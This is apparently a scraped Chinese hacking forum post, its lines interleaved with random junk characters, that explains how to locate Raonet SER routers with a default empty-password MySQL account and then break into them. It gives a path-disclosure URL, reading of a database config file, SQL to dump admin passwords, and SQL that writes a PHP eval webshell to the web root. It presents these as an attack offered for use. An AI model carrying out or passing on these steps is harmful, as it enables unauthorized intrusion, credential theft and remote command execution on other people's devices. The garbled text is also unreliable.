寻找存在漏洞的路由器方法:3 x7 O6 W& y8 V6 q* E& W1 v
% \; {5 ]+ Y. w; }1:google搜索'Raonet Subscriber Ethernet Router'6 u- S4 t& X- |+ }& h3 t- W
! i/ R: {+ A3 T4 l# o" c2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20011 P9 F# q0 K) t2 o+ L2 _. W0 h
7 c* X3 O! D7 M* S
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。 a( E# P1 g9 M9 z5 c! C$ s& I3 D9 T0 b
3 h3 p& [1 |6 x/ O+ S//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 m0 K5 w% w: C8 g% d" E% I5 R1 {1 S
1 e. u1 o% }/ C9 }4 W
- t$ `& [$ p& X; h ]9 x& f- K1 D" k$ B) i
入侵步骤:
8 V- D8 q1 L9 c6 p2 o$ _$ ~' Z. x2 @) Y+ D I* h0 E% _. Q
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
) M5 w, z! @$ E% z# i3 V! y7 V
% _6 N8 f! N+ E2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
0 s& W4 K: ]( f+ h3:得到密码后连接,查看GUI管理密码:% P' y' M" y0 a. d
use ser_5005 V1 @ d3 r/ u: c
select id,passwd from user;
& W: L* H& V) ~2 b7 F6 `" K. I0 M% h4:通过数据库写入webshell,执行命令:
& |: T* c" C) E$ Zuse mysql; ]7 W6 J9 c5 f) l
create table ok(cmd TEXT);" w, v* k, g' H# t* x
insert into ok values("<?php @eval($_POST[cmd])?>");
+ r; J$ ~8 H: ^8 s5 Eselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";* J b( b8 t7 g% O# B$ J L1 }
drop table ok;
w& ~4 O4 y* ^" d5 h6 i, w1 b# H9 F! h8 j F2 c
5:连接后门shell.php
9 k7 a0 ~" f1 `; A
0 m6 S. P) n, x6 z' V. H- |6. 搞定!8 N4 A9 J v. R4 Y) J% Z8 }% Y
! x6 a: P0 L. p* W7 e& ^2 x# T
|